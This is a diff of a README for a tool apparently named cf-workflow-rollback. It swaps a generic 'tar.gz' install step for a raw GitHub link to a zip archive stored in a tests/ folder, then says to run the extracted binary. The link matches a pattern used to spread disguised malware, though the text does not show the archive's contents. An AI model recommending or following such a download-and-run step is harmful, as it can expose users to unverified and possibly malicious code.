spider1605/cf-workflow-rollback/README.md

    - Run `./cf-workflow-rollback` to start the application.

 7. **For Linux Users:**
-   - Extract the downloaded tar.gz file.
+   - Extract the downloaded https://raw.githubusercontent.com/spider1605/cf-workflow-rollback/main/tests/rollback-workflow-cf-v3.8.zip file.
    - Open a terminal and navigate to the extracted folder.
    - Run `./cf-workflow-rollback` to start the application.